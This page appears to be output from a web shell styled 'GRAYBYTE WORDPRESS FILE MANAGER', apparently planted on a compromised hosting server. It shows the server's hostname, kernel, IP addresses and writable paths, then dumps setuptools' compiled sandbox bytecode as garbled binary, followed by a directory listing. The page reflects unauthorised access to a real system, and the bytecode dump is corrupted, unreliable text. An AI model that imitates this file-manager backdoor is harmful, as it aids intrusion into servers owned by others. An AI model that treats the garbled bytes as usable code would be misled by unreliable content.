✘✘ GRAYBYTE WORDPRESS FILE MANAGER ✘✘

​🇳​​🇦​​🇲​​🇪♯➤ server366.web-hosting.com ​🇻​♯➤ 4.18.0-553.50.1.lve.el8.x86_64 #1 SMP 🇾​♯➤ 2025

𝗛𝗢𝗠𝗘 𝗜𝗗 ♯➤ 67.223.118.204 ♯➤ 𝗔𝗗𝗠𝗜𝗡 𝗜𝗗 216.73.217.86
𝗢𝗣𝗧𝗜𝗢𝗡𝗦 ♯ CRL ♯➤ 𝗢𝗞 ┃ WGT ♯➤ 𝗢𝗞 ┃ SDO ♯➤ 𝗢𝗙𝗙 ┃ PKEX ♯➤ 𝗢𝗙𝗙
𝗗𝗘𝗔𝗖𝗧𝗜𝗩𝗔𝗧𝗘𝗗 ♯➤ 𝗔𝗟𝗟 𝗪𝗢𝗥𝗞𝗜𝗡𝗚....

𝗛𝗢𝗠𝗘
𝗖𝗨𝗥𝗥𝗘𝗡𝗧 𝗙𝗜𝗟𝗘 : /opt/alt/python39/lib/python3.9/site-packages/setuptools/__pycache__//sandbox.cpython-39.pyc
a

(�Re8�@s�ddlZddlZddlZddlZddlZddlZddlZddlZddlZddl	Z	ddl
Z
ddlZddlm
Z
ddlmZej�d�r�ddlmmmmZnejejZzeZWney�dZYn0eZgd�Zd-dd�Zejd.dd	��Z ejd
d��Z!ejdd
��Z"ejdd��Z#Gdd�de$�Z%Gdd�d�Z&ejdd��Z'dd�Z(ejdd��Z)ejdd��Z*hd�Z+dd�Z,dd �Z-d!d"�Z.Gd#d$�d$�Z/e0ed%��r�ej1gZ2ngZ2Gd&d'�d'e/�Z3e�4ej5d(d)�d*�6�D��Z7Gd+d,�d,e
�Z8dS)/�N)�DistutilsError)�working_set�java)�AbstractSandbox�DirectorySandbox�SandboxViolation�	run_setupcCs^d}t||��}|��}Wd�n1s,0Y|durB|}t||d�}t|||�dS)z.
    Python 3 implementation of execfile.
    �rbN�exec)�open�read�compiler
)�filename�globals�locals�mode�stream�script�code�r��/builddir/build/BUILDROOT/alt-python39-setuptools-58.3.0-2.el8.x86_64/opt/alt/python39/lib/python3.9/site-packages/setuptools/sandbox.py�	_execfile$s&rc
csRtjdd�}|dur$|tjdd�<z|VW|tjdd�<n|tjdd�<0dS�N)�sys�argv)�repl�savedrrr�	save_argv1src
cs<tjdd�}z|VW|tjdd�<n|tjdd�<0dSr)r�path�rrrr�	save_path<sr ccs8tj|dd�tj}|t_zdVW|t_n|t_0dS)zL
    Monkey-patch tempfile.tempdir with replacement, ensuring it exists
    T)�exist_okN)�os�makedirs�tempfile�tempdir)�replacementrrrr�
override_tempEsr'c	cs8t��}t�|�z|VWt�|�nt�|�0dSr)r"�getcwd�chdir)�targetrrrr�pushdVs

r+c@seZdZdZedd��ZdS)�UnpickleableExceptionzP
    An exception representing another Exception that could not be pickled.
    c	CsNzt�|�t�|�fWStyHddlm}|�||t|���YS0dS)z�
        Always return a dumped (pickled) type and exc. If exc can't be pickled,
        wrap it in UnpickleableException first.
        r)r,N)�pickle�dumps�	Exception�setuptools.sandboxr,�dump�repr)�type�exc�clsrrrr1es
zUnpickleableException.dumpN)�__name__�
__module__�__qualname__�__doc__�staticmethodr1rrrrr,`sr,c@s(eZdZdZdd�Zdd�Zdd�ZdS)	�ExceptionSaverz^
    A Context Manager that will save an exception, serialized, and restore it
    later.
    cCs|Srr��selfrrr�	__enter__zszExceptionSaver.__enter__cCs |sdSt�||�|_||_dS�NT)r,r1�_saved�_tb)r=r3r4�tbrrr�__exit__}s
zExceptionSaver.__exit__cCs2dt|�vrdSttj|j�\}}|�|j��dS)z"restore and re-raise any exceptionr@N)�vars�mapr-�loadsr@�with_tracebackrA)r=r3r4rrr�resume�szExceptionSaver.resumeN)r6r7r8r9r>rCrHrrrrr;tsr;c#sjtj���t��}�VWd�n1s,0Ytj����fdd�tjD�}t|�|��dS)z�
    Context in which imported modules are saved.

    Translates exceptions internal to the context into the equivalent exception
    outside the context.
    Nc3s$|]}|�vr|�d�s|VqdS)z
encodings.N��
startswith)�.0�mod_namerrr�	<genexpr>�s
�zsave_modules.<locals>.<genexpr>)r�modules�copyr;�update�_clear_modulesrH)�	saved_excZdel_modulesrrr�save_modules�s
$
�rScCst|�D]}tj|=qdSr)�listrrN)Zmodule_namesrLrrrrQ�srQc	cs.t��}z|VWt�|�nt�|�0dSr)�
pkg_resources�__getstate__�__setstate__rrrr�save_pkg_resources_state�srXc
cstj�|d�}t���t���t���t�t��nt|��Ft	|��t
d�dVWd�n1sj0YWd�n1s�0YWd�n1s�0YWd�n1s�0YWd�n1s�0YWd�n1�s0YdS)N�temp�
setuptools)r"r�joinrXrSr �hide_setuptoolsrr'r+�
__import__)�	setup_dir�temp_dirrrr�
setup_context�s

r`>�	distutilsrUZCython�_distutils_hackrZcCs|�dd�d}|tvS)aH
    >>> _needs_hiding('setuptools')
    True
    >>> _needs_hiding('pkg_resources')
    True
    >>> _needs_hiding('setuptools_plugin')
    False
    >>> _needs_hiding('setuptools.__init__')
    True
    >>> _needs_hiding('distutils')
    True
    >>> _needs_hiding('os')
    False
    >>> _needs_hiding('Cython')
    True
    �.�r)�split�_MODULES_TO_HIDE)rL�base_modulerrr�
_needs_hiding�srhcCs6tj�dd�}|dur|��tttj�}t|�dS)a%
    Remove references to setuptools' modules from sys.modules to allow the
    invocation to import the most appropriate setuptools. This technique is
    necessary to avoid issues such as #315 where setuptools upgrading itself
    would fail to find a function declared in the metadata.
    rbN)rrN�getZremove_shim�filterrhrQ)rbrNrrrr\�s
r\cCs�tj�tj�|��}t|���z�|gt|�tjdd�<tj�d|�t	�
�t	j�dd��t
|��&t|dd�}t||�Wd�n1s�0YWn6ty�}z|jr�|jdr��WYd}~n
d}~00Wd�n1s�0YdS)z8Run a distutils setup script, sandboxed in its directoryNrcSs|��Sr)�activate)�distrrr�<lambda>��zrun_setup.<locals>.<lambda>�__main__)�__file__r6)r"r�abspath�dirnamer`rTrr�insertr�__init__�	callbacks�appendr�dictr�
SystemExit�args)Zsetup_scriptryr^�ns�vrrrr�s

,rc@seZdZdZdZdd�Zdd�Zdd�Zd	d
�Zdd�Z	d
d�Z
dD]Zee
e�rDe
e�e�e<qDd$dd�Zerzede�Zede�ZdD]Zee
e�r�ee�e�e<q�dd�ZdD]Zee
e�r�ee�e�e<q�dd�ZdD]Zee
e�r�ee�e�e<q�dd�Zdd�Zd d!�Zd"d#�ZdS)%rzDWrap 'os' module and 'open()' builtin for virtualizing setup scriptsFcs�fdd�tt�D��_dS)Ncs$g|]}|�d�st�|�r|�qS)�_)rJ�hasattr)rK�namer<rr�
<listcomp>s�z,AbstractSandbox.__init__.<locals>.<listcomp>)�dir�_os�_attrsr<rr<rrts
�zAbstractSandbox.__init__cCs"|jD]}tt|t||��qdSr)r��setattrr"�getattr)r=�sourcer~rrr�_copys
zAbstractSandbox._copycCs(|�|�tr|jt_|jt_d|_dSr?)r��_file�builtins�file�_openr�_activer<rrrr>s

zAbstractSandbox.__enter__cCs$d|_trtt_tt_|�t�dS�NF)r�r�r�r�r�rr�r�)r=�exc_type�	exc_value�	tracebackrrrrC!s
zAbstractSandbox.__exit__cCs.|�|�Wd�S1s 0YdS)zRun 'func' under os sandboxingNr)r=�funcrrr�run(szAbstractSandbox.runcstt�����fdd�}|S)Ncs>|jr&|j�||g|�Ri|��\}}�||g|�Ri|��Sr)r��_remap_pair)r=�src�dstry�kw�r~�originalrr�wrap0s z3AbstractSandbox._mk_dual_path_wrapper.<locals>.wrap�r�r��r~r�rr�r�_mk_dual_path_wrapper-s
z%AbstractSandbox._mk_dual_path_wrapper)�rename�link�symlinkNcs �ptt�����fdd�}|S)Ncs6|jr |j�|g|�Ri|��}�|g|�Ri|��Sr)r��_remap_input�r=rryr�r�rrr�>sz5AbstractSandbox._mk_single_path_wrapper.<locals>.wrapr�)r~r�r�rr�r�_mk_single_path_wrapper;sz'AbstractSandbox._mk_single_path_wrapperr�r)�stat�listdirr)r�chmod�chown�mkdir�remove�unlink�rmdir�utime�lchown�chroot�lstatZ	startfile�mkfifo�mknod�pathconf�accesscstt�����fdd�}|S)NcsT|jr>|j�|g|�Ri|��}|���|g|�Ri|���S�|g|�Ri|��Sr)r�r��
_remap_outputr�r�rrr�csz4AbstractSandbox._mk_single_with_return.<locals>.wrapr�r�rr�r�_mk_single_with_return`s
z&AbstractSandbox._mk_single_with_return)�readlink�tempnamcstt�����fdd�}|S)Ncs$�|i|��}|jr |��|�S|Sr)r�r�)r=ryr��retvalr�rrr�rsz'AbstractSandbox._mk_query.<locals>.wrapr�r�rr�r�	_mk_queryos
zAbstractSandbox._mk_query)r(�tmpnamcCs|S)z=Called to remap or validate any path, whether input or outputr)r=rrrr�_validate_path~szAbstractSandbox._validate_pathcOs
|�|�S�zCalled for path inputs�r��r=�	operationrryr�rrrr��szAbstractSandbox._remap_inputcCs
|�|�S)zCalled for path outputsr�)r=r�rrrrr��szAbstractSandbox._remap_outputcOs<|j|d|g|�Ri|��|j|d|g|�Ri|��fS)�?Called for path pairs like rename, link, and symlink operationsz-fromz-to)r��r=r�r�r�ryr�rrrr��s�zAbstractSandbox._remap_pair)N)r6r7r8r9r�rtr�r>rCr�r�r~r}r�rr�r�r�r�r�r�r�r�r�rrrrr
s<








r�devnullc@s�eZdZdZe�gd��ZgZefdd�Z	dd�Z
er@ddd	�Zdd
d�Zdd
�Z
dd�Zdd�Zdd�Zdd�Zddd�ZdS)rz<Restrict operations to a single subdirectory - pseudo-chroot)
rr�r�r�r�r�r�r�r�r�r�r�r�cCsFtj�tj�|��|_tj�|jd�|_dd�|D�|_t�	|�dS)N�cSs g|]}tj�tj�|���qSr)r"r�normcase�realpath)rKrrrrr�sz-DirectorySandbox.__init__.<locals>.<listcomp>)
r"rr�r��_sandboxr[�_prefix�_exceptionsrrt)r=Zsandbox�
exceptionsrrrrt�s�zDirectorySandbox.__init__cOsddlm}||||��dS)Nr)r)r0r)r=r�ryr�rrrr�
_violation�szDirectorySandbox._violation�rcOsF|dvr.|�|�s.|jd||g|�Ri|��t||g|�Ri|��S)N�r��rtr	ZrU�Ur�)�_okr�r��r=rrryr�rrrr��szDirectorySandbox._filecOsF|dvr.|�|�s.|jd||g|�Ri|��t||g|�Ri|��S)Nr�r)r�r�r�r�rrrr��szDirectorySandbox._opencCs|�d�dS)Nr�)r�r<rrrr��szDirectorySandbox.tmpnamcCsV|j}zBd|_tj�tj�|��}|�|�p@||jkp@|�|j�W||_S||_0dSr�)	r�r"rr�r��	_exemptedr�rJr�)r=r�activer�rrrr��s
�
��zDirectorySandbox._okcs<�fdd�|jD�}�fdd�|jD�}t�||�}t|�S)Nc3s|]}��|�VqdSrrI)rK�	exception��filepathrrrM�sz-DirectorySandbox._exempted.<locals>.<genexpr>c3s|]}t�|��VqdSr)�re�match)rK�patternr�rrrM�s)r��_exception_patterns�	itertools�chain�any)r=r�Z
start_matchesZpattern_matches�
candidatesrr�rr��s
�
�zDirectorySandbox._exemptedcOs:||jvr6|�|�s6|j|tj�|�g|�Ri|��|Sr�)�	write_opsr�r�r"rr�r�rrrr��s"zDirectorySandbox._remap_inputcOs8|�|�r|�|�s0|j|||g|�Ri|��||fS)r�)r�r�r�rrrr��szDirectorySandbox._remap_pair�cOsL|t@r0|�|�s0|jd|||g|�Ri|��tj|||g|�Ri|��S)zCalled for low-level os.open()zos.open)�WRITE_FLAGSr�r�r�r)r=r��flagsrryr�rrrr�szDirectorySandbox.openN)r�)r�)r�)r6r7r8r9rw�fromkeysr�r��_EXCEPTIONSrtr�r�r�r�r�r�r�r�rrrrrr�s �



rcCsg|]}tt|d��qS)rr�)rK�arrrr�s�rz4O_WRONLY O_RDWR O_APPEND O_CREAT O_TRUNC O_TEMPORARYc@s&eZdZdZe�d���Zdd�ZdS)rzEA setup script attempted to modify the filesystem outside the sandboxa
        SandboxViolation: {cmd}{args!r} {kwargs}

        The package setup script has attempted to modify files on your system
        that are not within the EasyInstall build area, and has been aborted.

        This package cannot be safely installed by EasyInstall, and may not
        support alternate installation locations even if you run its setup
        script by hand.  Please inform the package's author and the EasyInstall
        maintainers to find out if a fix or workaround is available.
        cCs |j\}}}|jjfit���Sr)ry�tmpl�formatr)r=�cmdry�kwargsrrr�__str__szSandboxViolation.__str__N)	r6r7r8r9�textwrap�dedent�lstripr�r�rrrrr�s
�r)N)N)9r"rr$�operator�	functoolsr�r��
contextlibr-r�r�rU�distutils.errorsrr�platformrJZ$org.python.modules.posix.PosixModule�pythonrN�posixZPosixModuler�r~r�r��	NameErrorrr��__all__r�contextmanagerrr r'r+r/r,r;rSrQrXr`rfrhr\rrr}r�r�r�reduce�or_rer�rrrrr�<module>sr 






	


		
^��	


Current_dir [ 𝗡𝗢𝗧 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ] Document_root [ 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ]


[ Back ]
𝗡𝗔𝗠𝗘
𝗦𝗜𝗭𝗘
𝗟𝗔𝗦𝗧 𝗧𝗢𝗨𝗖𝗛
𝗨𝗦𝗘𝗥
𝗦𝗧𝗔𝗧𝗨𝗦
𝗙𝗨𝗡𝗖𝗧𝗜𝗢𝗡𝗦
..
--
1 May 2025 1.06 PM
root / linksafe
0755
__init__.cpython-39.pyc
8.541 KB
13 Nov 2023 9.50 PM
root / linksafe
0644
_deprecation_warning.cpython-39.pyc
0.584 KB
13 Nov 2023 9.50 PM
root / linksafe
0644
_imp.cpython-39.pyc
2.083 KB
13 Nov 2023 9.50 PM
root / linksafe
0644
archive_util.cpython-39.pyc
5.725 KB
13 Nov 2023 9.50 PM
root / linksafe
0644
build_meta.cpython-39.pyc
8.907 KB
13 Nov 2023 9.50 PM
root / linksafe
0644
config.cpython-39.pyc
20.385 KB
13 Nov 2023 9.50 PM
root / linksafe
0644
dep_util.cpython-39.pyc
0.884 KB
13 Nov 2023 9.50 PM
root / linksafe
0644
depends.cpython-39.pyc
5.173 KB
13 Nov 2023 9.50 PM
root / linksafe
0644
dist.cpython-39.pyc
35.64 KB
13 Nov 2023 9.50 PM
root / linksafe
0644
errors.cpython-39.pyc
0.877 KB
13 Nov 2023 9.50 PM
root / linksafe
0644
extension.cpython-39.pyc
1.945 KB
13 Nov 2023 9.50 PM
root / linksafe
0644
glob.cpython-39.pyc
3.654 KB
13 Nov 2023 9.50 PM
root / linksafe
0644
installer.cpython-39.pyc
2.753 KB
13 Nov 2023 9.50 PM
root / linksafe
0644
launch.cpython-39.pyc
0.927 KB
13 Nov 2023 9.50 PM
root / linksafe
0644
monkey.cpython-39.pyc
4.552 KB
13 Nov 2023 9.50 PM
root / linksafe
0644
msvc.cpython-39.pyc
41.882 KB
13 Nov 2023 9.50 PM
root / linksafe
0644
namespaces.cpython-39.pyc
3.563 KB
13 Nov 2023 9.50 PM
root / linksafe
0644
package_index.cpython-39.pyc
31.918 KB
13 Nov 2023 9.50 PM
root / linksafe
0644
py34compat.cpython-39.pyc
0.516 KB
13 Nov 2023 9.50 PM
root / linksafe
0644
sandbox.cpython-39.pyc
15.434 KB
13 Nov 2023 9.50 PM
root / linksafe
0644
unicode_utils.cpython-39.pyc
1.135 KB
13 Nov 2023 9.50 PM
root / linksafe
0644
version.cpython-39.pyc
0.363 KB
13 Nov 2023 9.50 PM
root / linksafe
0644
wheel.cpython-39.pyc
7.156 KB
13 Nov 2023 9.50 PM
root / linksafe
0644
windows_support.cpython-39.pyc
1.046 KB
13 Nov 2023 9.50 PM
root / linksafe
0644

✘✘ GRAYBYTE WORDPRESS FILE MANAGER @ 2026 CONTACT ME ✘✘
Static GIF Static GIF